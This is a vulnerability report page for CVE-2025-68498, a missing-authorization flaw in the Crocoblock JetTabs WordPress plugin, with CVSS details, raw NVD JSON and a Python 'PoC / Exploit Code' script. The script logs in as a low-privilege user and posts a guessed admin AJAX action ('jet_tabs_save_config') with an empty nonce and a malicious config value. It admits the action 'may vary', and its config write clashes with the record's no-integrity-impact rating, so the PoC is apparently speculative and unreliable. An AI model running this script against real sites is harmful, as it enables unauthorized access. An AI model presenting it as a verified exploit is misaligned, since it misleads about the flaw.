Security Vulnerability Report
中文
CVE-2025-68498 CVSS 6.5 MEDIUM

CVE-2025-68498

Published: 2025-12-30 00:15:52
Last Modified: 2026-04-23 15:35:55

Description

Missing Authorization vulnerability in Crocoblock JetTabs jet-tabs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetTabs: from n/a through <= 2.2.12.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JetTabs (Crocoblock) <= 2.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68498 PoC - JetTabs Missing Authorization # Target: WordPress site with JetTabs plugin <= 2.2.12 target_url = "http://target-wordpress-site.com" # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" session = requests.Session() # Replace with valid low-privilege user credentials credentials = { "log": "low_privilege_user", "pwd": "user_password", "wp-submit": "Log In" } login_response = session.post(login_url, data=credentials) if "wordpress_logged_in" not in str(login_response.cookies): print("[-] Login failed") sys.exit(1) print("[+] Successfully authenticated with low-privilege account") # Step 2: Exploit missing authorization in JetTabs AJAX endpoint # This endpoint should require admin capabilities but doesn't validate properly ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Try to access admin-level functionality # Action may vary - check plugin's AJAX handlers exploit_payload = { "action": "jet_tabs_save_config", "nonce": "", # May not be required due to missing check "config_data": "malicious_config" } print("[*] Sending exploit request...") exploit_response = session.post(ajax_endpoint, data=exploit_payload) if exploit_response.status_code == 200: print("[!] Potential vulnerability confirmed - unauthorized access possible") print(f"[+] Response: {exploit_response.text[:500]}") else: print("[-] Request blocked or endpoint not vulnerable") print("\n[*] PoC completed. Verify manually for full impact.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68498", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:52.440", "lastModified": "2026-04-23T15:35:55.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Crocoblock JetTabs jet-tabs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetTabs: from n/a through <= 2.2.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}